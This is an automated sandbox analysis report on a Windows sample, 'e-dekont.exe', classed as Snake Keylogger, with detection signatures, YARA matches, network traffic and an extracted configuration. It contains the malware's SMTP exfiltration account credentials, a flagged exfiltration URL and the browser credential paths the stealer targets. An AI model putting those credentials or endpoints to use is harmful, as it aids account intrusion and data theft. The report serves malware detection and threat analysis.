Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
e-dekont.exe

Overview

General Information

Sample name:e-dekont.exe
Analysis ID:1430774
MD5:ff53d6a04ea8618890f7a81e31bd8a22
SHA1:d804959bcb8a2ea43278a1f78aac8abede4fa62f
SHA256:5f8e6d5fd79a5a648e42597881ddf5e418be34a81b678b9742fad39d6b74c298
Tags:exegeoTUR
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • e-dekont.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\e-dekont.exe" MD5: FF53D6A04EA8618890F7A81E31BD8A22)
    • e-dekont.exe (PID: 7424 cmdline: "C:\Users\user\Desktop\e-dekont.exe" MD5: FF53D6A04EA8618890F7A81E31BD8A22)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "s.reyhani@agmfilter.com", "Password": "sibelr_63017", "Host": "mail.agmfilter.com", "Port": "587"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.4088425866.0000000003160000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x147ab:$a1: get_encryptedPassword
        • 0x14aa1:$a2: get_encryptedUsername
        • 0x145b7:$a3: get_timePasswordChanged
        • 0x146b2:$a4: get_passwordField
        • 0x147c1:$a5: set_encryptedPassword
        • 0x15da8:$a7: get_logins
        • 0x15d0b:$a10: KeyLoggerEventArgs
        • 0x159a4:$a11: KeyLoggerEventArgsEventHandler
        00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
        • 0x18184:$x1: $%SMTPDV$
        • 0x181e8:$x2: $#TheHashHere%&
        • 0x1983b:$x3: %FTPDV$
        • 0x1992f:$x4: $%TelegramDv$
        • 0x159a4:$x5: KeyLoggerEventArgs
        • 0x15d0b:$x5: KeyLoggerEventArgs
        • 0x1985f:$m2: Clipboard Logs ID
        • 0x19a2b:$m2: Screenshot Logs ID
        • 0x19af7:$m2: keystroke Logs ID
        • 0x19a03:$m4: \SnakeKeylogger\
        Click to see the 14 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.e-dekont.exe.4720090.8.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0.2.e-dekont.exe.4720090.8.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            0.2.e-dekont.exe.4720090.8.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x12bab:$a1: get_encryptedPassword
            • 0x12ea1:$a2: get_encryptedUsername
            • 0x129b7:$a3: get_timePasswordChanged
            • 0x12ab2:$a4: get_passwordField
            • 0x12bc1:$a5: set_encryptedPassword
            • 0x141a8:$a7: get_logins
            • 0x1410b:$a10: KeyLoggerEventArgs
            • 0x13da4:$a11: KeyLoggerEventArgsEventHandler
            0.2.e-dekont.exe.4720090.8.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
            • 0x1a53f:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x19771:$a3: \Google\Chrome\User Data\Default\Login Data
            • 0x19ba4:$a4: \Orbitum\User Data\Default\Login Data
            • 0x1abe3:$a5: \Kometa\User Data\Default\Login Data
            0.2.e-dekont.exe.4720090.8.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
            • 0x1375d:$s1: UnHook
            • 0x13764:$s2: SetHook
            • 0x1376c:$s3: CallNextHook
            • 0x13779:$s4: _hook
            Click to see the 28 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://scratchdreams.tkAvira URL Cloud: Label: malware
            Source: https://scratchdreams.tk/_send_.php?TSAvira URL Cloud: Label: malware
            Source: http://scratchdreams.tkAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "s.reyhani@agmfilter.com", "Password": "sibelr_63017", "Host": "mail.agmfilter.com", "Port": "587"}
            Multi AV Scanner detection for domain / URL
            Source: scratchdreams.tkVirustotal: Detection: 17%Perma Link
            Source: https://scratchdreams.tkVirustotal: Detection: 16%Perma Link
            Source: https://scratchdreams.tk/_send_.php?TSVirustotal: Detection: 14%Perma Link
            Source: http://scratchdreams.tkVirustotal: Detection: 17%Perma Link
            Multi AV Scanner detection for submitted file
            Source: e-dekont.exeReversingLabs: Detection: 60%
            Source: e-dekont.exeVirustotal: Detection: 61%Perma Link
            Machine Learning detection for sample
            Source: e-dekont.exeJoe Sandbox ML: detected
            Source: e-dekont.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49734 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.4:49750 version: TLS 1.2
            Source: e-dekont.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: wGVE.pdbSHA256S source: e-dekont.exe
            Source: Binary string: wGVE.pdb source: e-dekont.exe
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_02DCF21B
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_02DCF03B
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 02DCF7A1h2_2_02DCF4E8
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_02DCEA08
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 02DCFBF9h2_2_02DCF941
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 05B42658h2_2_05B42586
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 05B42091h2_2_05B41DE0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 05B417D1h2_2_05B41520
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 05B4F7D1h2_2_05B4F528
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 05B4C809h2_2_05B4C560
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 05B4EF21h2_2_05B4EC78
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 05B40F11h2_2_05B40C60
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 05B4E219h2_2_05B4DF70
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 05B4D969h2_2_05B4D6C0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 05B4D0B9h2_2_05B4CE10
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 05B4CC61h2_2_05B4C9B8
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 05B41C31h2_2_05B41980
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 05B4FC29h2_2_05B4F980
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 05B4C3B1h2_2_05B4C108
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 05B4F379h2_2_05B4F0D0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 05B41371h2_2_05B410C0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 05B4EAC9h2_2_05B4E820
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 05B4021Dh2_2_05B40040
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 05B40BA7h2_2_05B40040
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 05B4E671h2_2_05B4E3C8
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 05B4DDC1h2_2_05B4DB18
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 05B4D511h2_2_05B4D268
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 05B42658h2_2_05B42240
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 06C08D95h2_2_06C08A58
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 06C0774Ah2_2_06C074A0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 06C06169h2_2_06C05EC0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 06C05D11h2_2_06C05A68
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 06C088A9h2_2_06C08600
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 06C06E71h2_2_06C06BC8
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_06C037FA
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 06C06A19h2_2_06C06770
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 06C065C1h2_2_06C06318
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 06C00B99h2_2_06C008F0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 06C07BA1h2_2_06C078F8
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 06C00741h2_2_06C00498
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 06C002E9h2_2_06C00040
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_06C03808
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 06C072C9h2_2_06C07020
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 06C05891h2_2_06C055E8
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 06C01449h2_2_06C011A0
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 06C08451h2_2_06C081A8
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 06C00FF1h2_2_06C00D48
            Source: C:\Users\user\Desktop\e-dekont.exeCode function: 4x nop then jmp 06C07FF9h2_2_06C07D50

            Networking

            barindex
            Yara detected Generic Downloader
            Source: Yara matchFile source: 2.2.e-dekont.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-dekont.exe.4720090.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-dekont.exe.465b050.9.raw.unpack, type: UNPACKEDPE
            Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
            Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49734 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: checkip.dyndns.org
            Source: e-dekont.exe, 00000002.00000002.4088425866.0000000003124000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003116000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003160000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.00000000030FB000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003150000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: e-dekont.exe, 00000002.00000002.4088425866.0000000003124000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003116000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003160000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.00000000030AB000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.00000000030FB000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003150000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003068000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003056000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: e-dekont.exe, 00000002.00000002.4088425866.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: e-dekont.exe, 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: e-dekont.exe, 00000002.00000002.4088425866.0000000003124000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003116000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003160000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.00000000030FB000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003150000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: e-dekont.exe, 00000002.00000002.4088425866.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: e-dekont.exe, 00000002.00000002.4088425866.0000000003160000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://scratchdreams.tk
            Source: e-dekont.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000000.00000002.1664762334.00000000054D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: e-dekont.exe, 00000002.00000002.4088425866.0000000003124000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003116000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003160000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.00000000030AB000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.00000000030FB000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003150000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: e-dekont.exe, 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: e-dekont.exe, 00000002.00000002.4088425866.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/154.16.105.36
            Source: e-dekont.exe, 00000002.00000002.4088425866.0000000003124000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003116000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003160000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.00000000030AB000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.00000000030FB000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003150000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/154.16.105.36$
